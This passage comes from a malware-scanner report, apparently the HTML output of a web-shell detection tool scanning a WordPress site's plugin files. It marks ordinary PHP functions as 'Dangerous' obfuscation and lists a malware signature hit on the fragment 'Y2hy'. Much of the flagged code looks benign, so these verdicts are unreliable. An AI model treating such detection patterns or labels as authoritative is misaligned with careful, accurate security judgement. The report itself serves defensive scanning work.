</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1024</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' KB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 54</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bytes </span><span style="color: #007700">. </span><span style="color: #DD0000">' By'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 63</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">renderFileList</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 88</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">LoadFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Y2hy</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_247").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/hello.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 6</span><br><table id="file_248" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dolly_css</span><span style="color: #007700">() { echo </span><span style="color: #DD0000">" <style type='text/css'> #dolly { float: right; padding: 5px 10px; margin: 0; font-size: 12px; line-height: 1.6666; } .rtl #dolly { float: left; } .block-editor-page #dolly { display: none; } @media screen and (max-width: 782px) { #dolly,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hello_dolly_get_lyric</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wptexturize</span><span style="color: #007700">( </span><span style="color: #0000BB">$lyrics</span><span style="color: #007700">[ </span><span style="color: #0000BB">mt_rand</span><span style="color: #007700">( </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">count</span><span style="color: #007700">( </span><span style="color: #0000BB">$lyrics </span><span style="color: #007700">) - </span><span style="color: #0000BB">1 </span><span style="color: #007700">) ] );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hello_dolly</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 68</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up to execute when the admin_notices action is called</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 72</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dolly_css</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_248").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xjckb/includes/class-protect-uploads-i18n.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 684.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_249" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_plugin_textdomain</span><span style="color: #007700">() { </span><span style="color: #0000BB">load_plugin_textdomain</span><span style="color: #007700">( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">domain</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">dirname</span><span style="color: #007700">( </span><span style="color: #0000BB">dirname</span><span style="color: #007700">( </span><span style="color: #0000BB">plugin_basename</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">) ) ) . </span><span style="color: #DD0000">'/languages/' </span><span style="color: #007700">); } public function </span><span style="color: #0000BB">set_domain</span><span style="color: #007700">( </span><span style="color: #0000BB">$domain </span><span style="color: #007700">) { </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">domain </span><span style="color: #007700">= </span><span style="color: #0000BB">$domain</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 13</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_plugin_textdomain</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_domain</span><span style="color: #007700">( </span><span style="color: #0000BB">$domain </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_249").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xjckb/includes/class-protect-uploads-loader.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 4.33 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 12</span><br><table id="file_250" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { foreach ( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">filters </span><span style="color: #007700">as </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) { </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'hook'</span><span style="color: #007700">], array( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'component'</span><span style="color: #007700">], </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'callback'</span><span style="color: #007700">] ), </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'priority'</span><span style="color: #007700">], </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'accepted_args'</span><span style="color: #007700">] ); } foreach ( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">actions </span><span style="color: #007700">as </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) { </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'hook'</span><span style="color: #007700">],</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">definition on the $component</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">should be fired</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$component</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">= </span><span style="color: #0000BB">10</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">= </span><span style="color: #0000BB">1 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$component</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">= </span><span style="color: #0000BB">10</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">= </span><span style="color: #0000BB">1 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that is used to register the actions </span><span style="color: #007700">and </span><span style="color: #0000BB">hooks into a single</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 68</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">type The collection of actions </span><span style="color: #007700">and </span><span style="color: #0000BB">filters registered with WordPress</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 70</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add</span><span style="color: #007700">( </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">, </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$component</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 80</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to execute the </span><span style="color: #007700">list </span><span style="color: #0000BB">of actions </span><span style="color: #007700">and </span><span style="color: #0000BB">filters</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_250").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xjckb/includes/class-protect-uploads-deactivator.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 313.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_251" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { </span><span style="color: #0000BB">$plugin </span><span style="color: #007700">= new </span><span style="color: #0000BB">Alti_ProtectUploads_Admin</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">); </span><span style="color: #0000BB">$plugin</span><span style="color: #007700">-></span><span style="color: #0000BB">remove_index</span><span style="color: #007700">(); </span><span style="color: #0000BB">$plugin</span><span style="color: #007700">-></span><span style="color: #0000BB">remove_htaccess</span><span style="color: #007700">(); </span><span style="color: #0000BB">delete_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">().</span><span style="color: #DD0000">'-protection' </span><span style="color: #007700">); } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_251").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xjckb/includes/class-protect-uploads-activator.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 112.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_252" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_252").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xjckb/includes/class-protect-uploads.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.75 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 12</span><br><table id="file_253" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">loader</span><span style="color: #007700">-></span><span style="color: #0000BB">run</span><span style="color: #007700">(); } public function </span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">get_loader</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">loader</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">get_version</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_dependencies</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_locale</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">define_admin_hooks</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 54</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 61</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 64</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_loader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">loader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 69</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_version</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">;</span>
</span>
